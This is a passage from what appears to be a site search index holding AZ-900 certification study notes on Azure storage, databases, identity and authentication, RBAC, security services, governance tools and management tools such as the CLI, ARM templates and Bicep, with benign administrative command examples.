                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-explorer","title":"Azure Storage Explorer","text":"

                            Azure Storage Explorer is a standalone app that provides a graphical interface to manage files and blobs in your Azure Storage Account. It works on Windows, macOS, and Linux operating systems and uses AzCopy on the backend to perform all of the file and blob management tasks.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-file-sync","title":"Azure File Sync","text":"

                            Azure File Sync is a tool that lets you centralize your file shares in Azure Files and keep the flexibility, performance, and compatibility of a Windows file server.

                            With Azure File Sync, you can:

                            • Use any protocol that's available on Windows Server to access your data locally, including SMB, NFS, and FTPS.
                            • Have as many caches as you need across the world.
                            • Replace a failed local server by installing Azure File Sync on a new server in the same datacenter.
                            • Configure cloud tiering so the most frequently accessed files are replicated locally, while infrequently accessed files are kept in the cloud until requested.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-services","title":"Azure Data Services","text":"

                            Key databases in Azure: Azure Cosmos DB, Azure SQL Database, and Azure Database Migration Service.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cosmos-db","title":"Cosmos DB","text":"

Azure Cosmos DB is a multi-model database service that enables you to scale data out to multiple Azure regions across the world. This lets you build applications that are available at a global scale.

Fast, distributed NoSQL and relational database at any scale (additionally, it supports SQL for querying data stored in Cosmos DB). Ideal for developing high-performance applications of any size or scale with a fully managed and serverless distributed database supporting open-source PostgreSQL, MongoDB, and Apache Cassandra, as well as Java, Node.js, Python, and .NET.

                            Use case: As an example, Cosmos DB provides a highly scalable solution to build and query graph-based data solutions.
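
A hedged sketch of the global distribution described above, creating an account replicated to two regions with the Azure CLI (the account name and regions are illustrative):

```bash
# Create a Cosmos DB account replicated across two regions,
# with westeurope as the write region and eastus as the failover region
az cosmosdb create \
  --resource-group rg-demo \
  --name cosmos-demo-12345 \
  --locations regionName=westeurope failoverPriority=0 isZoneRedundant=False \
  --locations regionName=eastus failoverPriority=1 isZoneRedundant=False
```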

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sql-database","title":"Azure SQL Database","text":"

                            Azure SQL Database is a PaaS offering in which Microsoft hosts the SQL platform and manages maintenance like upgrades and patching, monitoring, and all activities to assure a 99.99% uptime.

                            Additionally, it's a relational database as a service (DaaS) based on the latest stable version of the Microsoft SQL Server database engine.

                            Use case: Flexible, fast, and elastic SQL database for your new apps. Build apps that scale with a fully managed and intelligent SQL database built for the cloud.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-migration-service_1","title":"Azure Database Migration Service","text":"

                            It's a fully-managed service designed to enable seamless migrations from multiple database sources to Azure data platforms with minimal downtime.

It uses the Microsoft Data Migration Assistant to generate assessment reports prior to a migration.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#sql-database-elastic-pools","title":"SQL Database elastic pools","text":"

Just like Azure VM Scale Sets are used with VMs, you can use Elastic Pools with Azure SQL Databases!

SQL Database elastic pools are a simple, cost-effective solution for managing and scaling multiple databases that have varying and unpredictable usage demands. The databases in an elastic pool are on a single Azure SQL Database server and share a set number of resources at a set price. Elastic pools in Azure SQL Database enable SaaS developers to optimize the price performance for a group of databases within a prescribed budget while delivering performance elasticity for each database.
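
A rough sketch under the DTU purchasing model, assuming an existing logical server `sql-demo` in `rg-demo` (both illustrative); the exact sizing flags vary by purchasing model, so treat this as an example rather than a recipe:

```bash
# Create an elastic pool on an existing logical SQL server
az sql elastic-pool create \
  --resource-group rg-demo \
  --server sql-demo \
  --name pool-saas \
  --edition Standard \
  --capacity 100

# Create a database directly inside the pool so it shares the pool's resources
az sql db create \
  --resource-group rg-demo \
  --server sql-demo \
  --name tenant1-db \
  --elastic-pool pool-saas
```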

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#other-database-services-postgresql-mariadb-mysql-redis-cache","title":"Other database services: PostgreSQL, MariaDB, MySQL, Redis Cache","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-postgresql","title":"Azure Database for PostgreSQL","text":"

                            Fully managed, intelligent, and scalable PostgreSQL database.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-mysql","title":"Azure Database for MySQL","text":"

                            Scalable, open-source MySQL database

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-mariadb","title":"Azure Database for MariaDB","text":"

                            Fully managed, community MariaDB

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cache-for-redis","title":"Azure Cache for Redis","text":"

                            Distributed, in-memory, scalable caching

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-identity-access-and-security","title":"Azure identity, access, and security","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-directory-services","title":"Azure directory services","text":"

                            When you secure identities on-premises with Active Directory, Microsoft doesn't monitor sign-in attempts. When you connect Active Directory with Azure AD, Microsoft can help protect you by detecting suspicious sign-in attempts at no extra cost.

Azure AD provides services such as:

• Authentication: This includes verifying identity to access applications and resources. It also includes providing functionality such as self-service password reset, multifactor authentication, a custom list of banned passwords, and smart lockout services.
• Single sign-on: Single sign-on (SSO) enables you to remember only one username and one password to access multiple applications. A single identity is tied to a user, which simplifies the security model. As users change roles or leave an organization, access modifications are tied to that identity, which greatly reduces the effort needed to change or disable accounts.
• Application management: You can manage your cloud and on-premises apps by using Azure AD. Features like Application Proxy, SaaS apps, the My Apps portal, and single sign-on provide a better user experience.
• Device management: Along with accounts for individual people, Azure AD supports the registration of devices. Registration enables devices to be managed through tools like Microsoft Intune. It also allows for device-based Conditional Access policies to restrict access attempts to only those coming from known devices, regardless of the requesting user account.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-connect","title":"Azure AD Connect","text":"

                            If you had an on-premises environment running Active Directory and a cloud deployment using Azure AD, you would need to maintain two identity sets. However, you can connect Active Directory with Azure AD, enabling a consistent identity experience between cloud and on-premises.

                            One method of connecting Azure AD with your on-premises AD is using Azure AD Connect. Azure AD Connect synchronizes user identities between on-premises Active Directory and Azure AD. Azure AD Connect synchronizes changes between both identity systems, so you can use features like SSO, multifactor authentication, and self-service password reset under both systems.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-active-directory-domain-services-azure-ad-ds","title":"Azure Active Directory Domain Services (Azure AD DS)","text":"

                            Azure Active Directory Domain Services (Azure AD DS) is a service that provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/NTLM authentication. Just like Azure AD lets you use directory services without having to maintain the infrastructure supporting it, with Azure AD DS, you get the benefit of domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

                            Azure AD DS integrates with your existing Azure AD tenant. This integration lets users sign into services and applications connected to the managed domain using their existing credentials.

                            How does Azure AD DS work? When you create an Azure AD DS managed domain, you define a unique namespace. This namespace is the domain name. Two Windows Server domain controllers are then deployed into your selected Azure region. This deployment of DCs is known as a replica set. You don't need to manage, configure, or update these DCs. The Azure platform handles the DCs as part of the managed domain, including backups and encryption at rest using Azure Disk Encryption.

                            A managed domain is configured to perform a one-way synchronization from Azure AD to Azure AD DS. You can create resources directly in the managed domain, but they aren't synchronized back to Azure AD.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-authentication-services","title":"Azure authentication services","text":"

                            Authentication is the process of establishing the identity of a person, service, or device. Azure supports multiple authentication methods, including standard passwords, single sign-on (SSO), multifactor authentication (MFA), and passwordless.

                            Single sign-on (SSO) enables a user to sign in one time and use that credential to access multiple resources and applications from different providers. Single sign-on is only as secure as the initial authenticator because the subsequent connections are all based on the security of the initial authenticator.

                            Multifactor authentication (MFA) is the process of prompting a user for an extra form (or factor) of identification during the sign-in process. These factors fall into three categories:

• Something the user knows - this might be a challenge question.
• Something the user has - this might be a code that's sent to the user's mobile phone.
• Something the user is - this is typically some sort of biometric property, such as a fingerprint or face scan.

                            Passwordless authentication methods are more convenient because the password is removed and replaced with something you have, plus something you are, or something you know. Passwordless authentication needs to be set up on a device before it can work.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-multi-factor-authentication","title":"Azure AD Multi-Factor Authentication","text":"

                            Azure AD Multi-Factor Authentication is a Microsoft service that provides multifactor authentication capabilities. Azure AD Multi-Factor Authentication enables users to choose an additional form of authentication during sign-in, such as a phone call or mobile app notification.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#windows-hello-for-business","title":"Windows Hello for Business","text":"

Each organization has different needs when it comes to authentication. Microsoft global Azure and Azure Government offer three passwordless authentication options that integrate with Azure Active Directory (Azure AD): Windows Hello for Business, the Microsoft Authenticator app, and FIDO2 security keys.

                            Windows Hello for Business is ideal for information workers that have their own designated Windows PC. The biometric and PIN credentials are directly tied to the user's PC, which prevents access from anyone other than the owner. With public key infrastructure (PKI) integration and built-in support for single sign-on (SSO), Windows Hello for Business provides a convenient method for seamlessly accessing corporate resources on-premises and in the cloud.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-authenticator-app","title":"Microsoft Authenticator App","text":"

                            The Authenticator App turns any iOS or Android phone into a strong, passwordless credential. Users can sign-in to any platform or browser by getting a notification to their phone, matching a number displayed on the screen to the one on their phone, and then using their biometric (touch or face) or PIN to confirm.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#fido2-security-keys","title":"FIDO2 security keys","text":"

Fast Identity Online (FIDO) is an open standard for passwordless authentication. FIDO allows users and organizations to leverage the standard to sign in to their resources without a username or password by using an external security key or a platform key built into a device. Users can register and then select a FIDO2 security key at the sign-in interface as their main means of authentication. These FIDO2 security keys are typically USB devices, but could also use Bluetooth or NFC. With a hardware device that handles the authentication, the security of an account is increased as there's no password that could be exposed or guessed.

                            The FIDO (Fast IDentity Online) Alliance helps to promote open authentication standards and reduce the use of passwords as a form of authentication. FIDO2 is the latest standard that incorporates the web authentication (WebAuthn) standard.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-external-identities","title":"Azure AD external identities","text":"

                            Azure AD External Identities refers to all the ways you can securely interact with users outside of your organization.

• Business to business (B2B) collaboration - Collaborate with external users by letting them use their preferred identity to sign in to your Microsoft applications or other enterprise applications (SaaS apps, custom-developed apps, etc.). B2B collaboration users are represented in your directory, typically as guest users.
• B2B direct connect - Establish a mutual, two-way trust with another Azure AD organization for seamless collaboration. B2B direct connect currently supports Teams shared channels, enabling external users to access your resources from within their home instances of Teams. B2B direct connect users aren't represented in your directory, but they're visible from within the Teams shared channel and can be monitored in Teams admin center reports.
• Azure AD business to customer (B2C) - Publish modern SaaS apps or custom-developed apps (excluding Microsoft apps) to consumers and customers, while using Azure AD B2C for identity and access management.

                            Depending on how you want to interact with external organizations and the types of resources you need to share, you can use a combination of these capabilities.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-conditional-access","title":"Azure conditional access","text":"

                            Conditional Access is a tool that Azure Active Directory uses to allow (or deny) access to resources based on identity signals. These signals include who the user is, where the user is, and what device the user is requesting access from. During sign-in, Conditional Access collects signals from the user, makes decisions based on those signals, and then enforces that decision by allowing or denying the access request or challenging for a multifactor authentication response.

                            Conditional Access is useful when you need to:

• Require multifactor authentication (MFA) to access an application depending on the requester's role, location, or network. For example, you could require MFA for administrators but not regular users, or for people connecting from outside your corporate network.
                            • Require access to services only through approved client applications. For example, you could limit which email applications are able to connect to your email service.
                            • Require users to access your application only from managed devices. A managed device is a device that meets your standards for security and compliance.
                            • Block access from untrusted sources, such as access from unknown or unexpected locations.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resource-manager-for-role-based-access-control-rbac","title":"Azure Resource Manager for role-based access control (RBAC)","text":"

                            Azure Resource Manager is a management service that provides a way to organize and secure your cloud resources.

                            Azure provides built-in roles that describe common access rules for cloud resources. You can also define your own roles.

                            Scopes include:

                            • A management group (a collection of multiple subscriptions).
                            • A single subscription.
                            • A resource group.
                            • A single resource.

                            Azure RBAC is hierarchical, in that when you grant access at a parent scope, those permissions are inherited by all child scopes. For example:

                            • When you assign the Owner role to a user at the management group scope, that user can manage everything in all subscriptions within the management group.
                            • When you assign the Reader role to a group at the subscription scope, the members of that group can view every resource group and resource within the subscription.
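
A hedged sketch of both examples with the Azure CLI; the subscription ID, user names, and resource group are placeholders:

```bash
# Reader at subscription scope: the assignee can view everything in the subscription
az role assignment create \
  --assignee "alice@contoso.com" \
  --role "Reader" \
  --scope "/subscriptions/00000000-0000-0000-0000-000000000000"

# Contributor at resource-group scope: inherited by every resource in rg-demo
az role assignment create \
  --assignee "bob@contoso.com" \
  --role "Contributor" \
  --scope "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-demo"
```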

Azure RBAC is enforced on any action that's initiated against an Azure resource and that passes through Azure Resource Manager.

                            You typically access Resource Manager from the Azure portal, Azure Cloud Shell, Azure PowerShell, and the Azure CLI.

                            Azure RBAC doesn't enforce access permissions at the application or data level. Application security must be handled by your application.

                            Azure RBAC uses an allow model. When you're assigned a role, Azure RBAC allows you to perform actions within the scope of that role. If one role assignment grants you read permissions to a resource group and a different role assignment grants you write permissions to the same resource group, you have both read and write permissions on that resource group.

                            You can have up to 2000 role assignments in each subscription.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#zero-trust-model","title":"Zero trust model","text":"

                            Traditionally, corporate networks were restricted, protected, and generally assumed safe. Only managed computers could join the network, VPN access was tightly controlled, and personal devices were frequently restricted or blocked.

The Zero Trust model flips that scenario. Instead of assuming that a device is safe because it's within the corporate network, it requires everyone to authenticate, and then grants access based on authentication rather than location.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#defense-in-depth","title":"Defense-in-depth","text":"

                            A defense-in-depth strategy uses a series of mechanisms to slow the advance of an attack that aims at acquiring unauthorized access to data.

                            This approach removes reliance on any single layer of protection. It slows down an attack and provides alert information that security teams can act upon, either automatically or manually.

                            Here's a brief overview of the role of each layer:

                            • The physical security layer is the first line of defense to protect computing hardware in the datacenter. Physically securing access to buildings and controlling access to computing hardware within the datacenter are the first line of defense.
                            • The identity and access layer controls access to infrastructure and change control. The identity and access layer is all about ensuring that identities are secure, that access is granted only to what's needed, and that sign-in events and changes are logged.
• The perimeter layer uses distributed denial of service (DDoS) protection to filter large-scale attacks before they can cause a denial of service for users. The network perimeter protects from network-based attacks against your resources. Identifying these attacks, eliminating their impact, and alerting you when they happen are important ways to keep your network secure (DDoS protection + firewalls).
• The network layer limits communication between resources through segmentation and access controls: limit communication between resources, deny by default, restrict inbound internet access and limit outbound access where appropriate, and implement secure connectivity to on-premises networks.
• The compute layer secures access to virtual machines: implement endpoint protection on devices and keep systems patched and current.
• The application layer helps ensure that applications are secure and free of security vulnerabilities: store sensitive application secrets in a secure storage medium, and make security a design requirement for all application development.
                            • The data layer controls access to business and customer data that you need to protect.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-defender-for-cloud","title":"Microsoft Defender for Cloud","text":"

                            Defender for Cloud is a monitoring tool for security posture management and threat protection. It monitors your cloud, on-premises, hybrid, and multi-cloud environments to provide guidance and notifications aimed at strengthening your security posture.

When necessary, Defender for Cloud can automatically deploy a Log Analytics agent to gather security-related data. For Azure machines, deployment is handled directly. For hybrid and multi-cloud environments, Microsoft Defender plans are extended to non-Azure machines with the help of Azure Arc. Cloud security posture management (CSPM) features are extended to multi-cloud machines without the need for any agents.

                            Defender for Cloud helps you detect threats across:

                            • Azure PaaS services – Detect threats targeting Azure services. You can also perform anomaly detection on your Azure activity logs using the native integration with Microsoft Defender for Cloud Apps (formerly known as Microsoft Cloud App Security).
                            • Azure data services – Defender for Cloud includes capabilities that help you automatically classify your data in Azure SQL.
                            • Networks – Defender for Cloud helps you limit exposure to brute-force attacks. By reducing access to virtual machine ports with just-in-time VM access, you can harden your network by preventing unnecessary access.

                            Defender for Cloud can also protect resources in other clouds (such as AWS and GCP). For example, if you've connected an Amazon Web Services (AWS) account to an Azure subscription, you can enable any of these protections:

                            • Defender for Cloud's CSPM features extend to your AWS resources. This agentless plan assesses your AWS resources according to AWS-specific security recommendations, and includes the results in the secure score. The resources will also be assessed for compliance with built-in standards specific to AWS (AWS CIS, AWS PCI DSS, and AWS Foundational Security Best Practices). Defender for Cloud's asset inventory page is a multi-cloud enabled feature helping you manage your AWS resources alongside your Azure resources.
                            • Microsoft Defender for Containers extends its container threat detection and advanced defenses to your Amazon EKS Linux clusters.
                            • Microsoft Defender for Servers brings threat detection and advanced defenses to your Windows and Linux EC2 instances.

                            Defender for Cloud fills three vital needs:

                            • Continuously assess – Know your security posture; identify and track vulnerabilities. Defender for Cloud helps you continuously assess your environment and includes vulnerability assessment solutions for your virtual machines, container registries, and SQL servers. Microsoft Defender for Servers includes automatic, native integration with Microsoft Defender for Endpoint.
                            • Secure – Harden resources and services with Azure Security Benchmark. In Defender for Cloud, you can set your policies to run on management groups, across subscriptions, and even for a whole tenant. Defender for Cloud assesses whether new resources are configured according to security best practices. If not, they're flagged and you get a prioritized list of recommendations for what you need to fix. In this way, Defender for Cloud enables you not just to set security policies, but to apply secure configuration standards across your resources. To help you understand how important each recommendation is to your overall security posture, Defender for Cloud groups the recommendations into security controls and adds a secure score value to each control.
                            • Defend – Detect and resolve threats to resources, workloads, and services. When Defender for Cloud detects a threat in any area of your environment, it generates a security alert. Security alerts describe details of the affected resources, suggest remediation steps, and in some cases provide an option to trigger a logic app in response.
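
                            As a hedged sketch (assuming an authenticated Azure CLI session), individual Defender plans can be enabled per resource type; the plan name below is one of the built-in options:

                            # Enable Microsoft Defender for Servers on the current subscription\naz security pricing create --name VirtualMachines --tier Standard\n\n# Review which Defender plans are currently enabled\naz security pricing list --output table\n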
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#governance-and-compliance-features-and-tools","title":"Governance and compliance: features and tools","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-purview","title":"Microsoft Purview","text":"

                            Microsoft Purview is a family of data governance, risk, and compliance solutions that helps you get a single, unified view into your data. Microsoft Purview brings insights about your on-premises, multicloud, and software-as-a-service data together. It provides:

                            • Automated data discovery
                            • Sensitive data classification
                            • End-to-end data lineage

                            Microsoft Purview risk and compliance solutions: Microsoft 365 features as a core component of the Microsoft Purview risk and compliance solutions. Microsoft Teams, OneDrive, and Exchange are just some of the Microsoft 365 services that Microsoft Purview uses to help manage and monitor your data.

                            Unified data governance: Microsoft Purview has robust, unified data governance solutions that help manage your on-premises, multicloud, and software-as-a-service data. Microsoft Purview's robust data governance capabilities enable you to manage your data stored in Azure, SQL and Hive databases, locally, and even in other clouds like Amazon S3.

                            Microsoft Purview's unified data governance helps your organization:

                            • Create an up-to-date map of your entire data estate that includes data classification and end-to-end lineage.
                            • Identify where sensitive data is stored in your estate.
                            • Create a secure environment for data consumers to find valuable data.
                            • Generate insights about how your data is stored and used.
                            • Manage access to the data in your estate securely and at scale.

                            Which feature in the Microsoft Purview governance portal should you use to manage access to data sources and datasets?

                            • Incorrect: Data Catalog – This enables data discovery.
                            • Incorrect: Data Sharing – This shares data within and between organizations.
                            • Incorrect: Data Estate Insights – This assesses data estate health.
                            • Correct: Data Policy – This governs access to data.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-policy","title":"Azure Policy","text":"

                            Azure Policy is a service in Azure that enables you to create, assign, and manage policies that control or audit your resources.

                            Azure Policy enables you to define both individual policies and groups of related policies, known as initiatives. Azure Policy evaluates your resources and highlights resources that aren't compliant with the policies you've created. Azure Policy can also prevent noncompliant resources from being created.

                            Azure Policies can be applied at each level, enabling you to set policies on a specific resource, resource group, subscription, and so on. Additionally, Azure Policies are inherited, so if you set a policy at a high level, it will automatically be applied to all of the groupings that fall within the parent.

                            Azure Policy comes with built-in policy and initiative definitions for Storage, Networking, Compute, Security Center, and Monitoring. In some cases, Azure Policy can automatically remediate noncompliant resources and configurations to ensure the integrity of the state of the resources. This applies, for example, in the tagging of resources. If you have a specific resource that you don't want Azure Policy to automatically fix, you can flag that resource as an exception.
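
                            A minimal sketch of creating a policy assignment with the Azure CLI, assuming an authenticated session; the resource group name is hypothetical, and the assignment references the built-in "Allowed locations" definition by looking up its name first:

                            # Find the name of the built-in "Allowed locations" policy definition\nDEF_NAME=$(az policy definition list --query "[?displayName=='Allowed locations'].name" --output tsv)\n\n# Assign it at resource-group scope so resources outside eastus are denied\naz policy assignment create --name allowed-locations --policy "$DEF_NAME" --resource-group demo-rg --params '{"listOfAllowedLocations":{"value":["eastus"]}}'\n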

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-initiative-policies","title":"Azure initiative policies","text":"

                            An Azure Policy initiative is a way of grouping related policies together. The initiative definition contains all of the policy definitions to help track your compliance state for a larger goal. For instance, the Enable Monitoring in Azure Security Center initiative contains over 100 separate policy definitions. Its goal is to monitor all available security recommendations for all Azure resource types in Azure Security Center.

                            Under this initiative, the following policy definitions are included:

                            • Monitor unencrypted SQL Database in Security Center: monitors for unencrypted SQL databases and servers.
                            • Monitor OS vulnerabilities in Security Center: monitors servers that don't satisfy the configured OS vulnerability baseline.
                            • Monitor missing Endpoint Protection in Security Center: monitors for servers that don't have an installed endpoint protection agent.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#resource-locks","title":"Resource locks","text":"

                            Resource locks prevent resources from being deleted or updated, depending on the type of lock. Resource locks can be applied to individual resources, resource groups, or even an entire subscription. Resource locks are inherited, meaning that if you place a resource lock on a resource group, all of the resources within the resource group will also have the resource lock applied.

                            There are two types of resource locks: one prevents users from deleting a resource, and the other prevents users from changing or deleting a resource.

                            • Delete means authorized users can still read and modify a resource, but they can't delete the resource.
                            • ReadOnly means authorized users can read a resource, but they can't delete or update the resource. Applying this lock is similar to restricting all authorized users to the permissions granted by the Reader role.

                            You can manage resource locks from the Azure portal, PowerShell, the Azure CLI, or from an Azure Resource Manager template. To view, add, or delete locks, go to the Settings section of any resource's pane in the Azure portal. To modify a locked resource, you must first remove the lock. After you remove the lock, you can apply any action you have permissions to perform. Resource locks apply regardless of RBAC permissions. Even if you're an owner of the resource, you must still remove the lock before you can perform the blocked activity.
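
                            A minimal sketch with the Azure CLI (names are hypothetical) showing a lock being created at resource-group scope and removed before a blocked operation:

                            # Prevent deletion of the resource group and, by inheritance, everything inside it\naz lock create --name no-delete --lock-type CanNotDelete --resource-group demo-rg\n\n# Remove the lock before performing the blocked activity\naz lock delete --name no-delete --resource-group demo-rg\n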

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-trust-portal","title":"Service Trust portal","text":"

                            The Microsoft Service Trust Portal provides access to various content, tools, and other resources about Microsoft security, privacy, and compliance practices.

                            You can access the Service Trust Portal at https://servicetrust.microsoft.com/.

                            The Service Trust Portal features and content are accessible from the main menu. The categories on the main menu are:

                            • Service Trust Portal provides a quick-access hyperlink to return to the Service Trust Portal home page.
                            • My Library lets you save (or pin) documents to quickly access them on your My Library page. You can also opt in to receive notifications when documents in your My Library are updated.
                            • All Documents is a single landing place for documents on the Service Trust Portal. From All Documents, you can pin documents to have them show up in your My Library.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#key-azure-management-tools","title":"Key Azure Management Tools","text":"

                            There are several tools at your disposal to manage Azure resources and environments. They include the Azure Portal, Azure PowerShell, Azure CLI, the Azure Mobile App, and ARM templates.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-portal","title":"Azure Portal","text":"

                            The Azure portal is a web-based user interface that you can use to access almost every feature of Azure. It can be used to visually understand and manage your Azure environment. By contrast, Azure PowerShell allows you to quickly perform one-off tasks and to script tasks as needed; it is available for Windows, Linux, and Mac, and you can access it in a web browser via Azure Cloud Shell.

                            Azure Portal does not offer a way to automate repetitive tasks.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cloud-shell","title":"Azure Cloud Shell","text":"

                            Browser-based scripting environment that is accessible from the Azure portal. It requires a storage account and allows you to choose the shell experience that suits you best.

                            During AZ-900 preparation on the Microsoft Learn platform, an Azure Cloud Shell is provided.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cli","title":"Azure CLI","text":"

                            Azure CLI is a command-line program to connect to Azure and execute administrative commands on Azure resources. It runs on Linux, macOS, and Windows, and allows administrators and developers to execute their commands through a terminal, command-line prompt, or script instead of a web browser.

                            It's an executable program that you can use to execute commands in Bash. You can use the Azure CLI to perform every possible management task in Azure. Launch the Azure CLI in interactive mode:

                            # Launch Azure CLI interactive mode from Azure Cloud Shell\naz interactive\n\n# Inside interactive mode, commands run without the az prefix:\nversion\nupgrade\nexit\n

                            See cheat sheet for Azure CLI.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-powershell","title":"Azure PowerShell","text":"

                            Azure PowerShell is a shell with which developers, DevOps, and IT professionals can run commands called command-lets (cmdlets). These commands call the Azure REST API to perform management tasks in Azure.

                            In addition to being available via Azure Cloud Shell, Azure PowerShell can be installed and configured on Windows, Linux, and Mac platforms.

                            See cheat sheet for Azure PowerShell.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resource-manager-arm-and-azure-arm-templates","title":"Azure Resource Manager (ARM) and Azure ARM templates","text":"

                            Azure Resource Manager (ARM) is the service used to provision resources in Azure (via the portal, Azure CLI, Terraform, etc.). A resource can be anything you provision inside an Azure subscription. Resources always belong to a Resource Group. Each type of resource (VM, Web App) is provisioned and managed by a Resource Provider (RP). There are close to two hundred RPs within the Azure platform today (and growing with the release of each new service).

                            Azure Arc takes the notion of the Resource Provider and extends it to resources outside of Azure. Azure Arc introduces a new Resource Provider (RP) called "Hybrid Compute". The HybridCompute RP is responsible for managing the resources outside of Azure. It manages the external resources by connecting to the Azure Arc agent, deployed to the external VM. Once we deploy the Azure Arc agent to a VM running, for instance, in Google Cloud, the VM shows up inside the Azure portal within the resource group "az_arc_rg". Since the Google Cloud hosted VM (gcp-vm-001) is an ARM resource, it is an object inside Azure AD. Furthermore, there can be a managed identity associated with the Google VM.

                            With Azure Resource Manager, you can:

                            • Manage your infrastructure through declarative templates rather than scripts. A Resource Manager template is a JSON file that defines what you want to deploy to Azure.
                            • Deploy, manage, and monitor all the resources for your solution as a group, rather than handling these resources individually.
                            • Re-deploy your solution throughout the development life-cycle and have confidence your resources are deployed in a consistent state.
                            • Define the dependencies between resources, so they're deployed in the correct order.
                            • Apply access control to all services because RBAC is natively integrated into the management platform.
                            • Apply tags to resources to logically organize all the resources in your subscription.
                            • Clarify your organization's billing by viewing costs for a group of resources that share the same tag.

                            Infrastructure as code: ARM templates and Bicep are two examples of using infrastructure as code with the Azure Resource Manager to maintain your environment.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#arm-templates_1","title":"ARM templates","text":"

                            By using ARM templates, you can describe the resources you want to use in a declarative JSON format. With an ARM template, the deployment code is verified before any code is run. This ensures that the resources will be created and connected correctly. The template then orchestrates the creation of those resources in parallel. Templates can even execute PowerShell and Bash scripts before or after the resource has been set up.

                            Benefits of using ARM templates:

                            • Declarative syntax: ARM templates allow you to create and deploy an entire Azure infrastructure declaratively.
                            • Repeatable results: Repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner.
                            • Orchestration: You don't have to worry about the complexities of ordering operations and interdependencies.
                            • Modular files: You can break your templates into smaller, reusable components and link them together at deployment time.
                            • Extensibility: With deployment scripts, you can add PowerShell or Bash scripts to your templates.
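
                            As a hedged sketch (the template file name and resource group are placeholders), a resource-group-scoped template deployment from the Azure CLI looks like this:

                            # Create a target resource group, then deploy the ARM template into it\naz group create --name demo-rg --location eastus\naz deployment group create --resource-group demo-rg --template-file azuredeploy.json\n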
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#biceps","title":"Biceps","text":"

                            Bicep is a language that uses declarative syntax to deploy Azure resources. A Bicep file defines the infrastructure and configuration. Then, ARM deploys that environment based on your Bicep file. While similar to an ARM template, which is written in JSON, Bicep files tend to use a simpler, more concise style.

                            Benefits of using Bicep files:

                            • Support for all resource types and API versions: Bicep immediately supports all preview and GA versions for Azure services.
                            • Simple syntax: When compared to the equivalent JSON template, Bicep files are more concise and easier to read. Bicep requires no previous knowledge of programming languages.
                            • Repeatable results: Repeatedly deploy your infrastructure throughout the development lifecycle and have confidence your resources are deployed in a consistent manner.
                            • Orchestration: You don't have to worry about the complexities of ordering operations.
                            • Modularity: You can break your Bicep code into manageable parts by using modules.
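
                            A minimal sketch, assuming a local main.bicep file; a recent Azure CLI can deploy the Bicep file directly or transpile it to JSON first:

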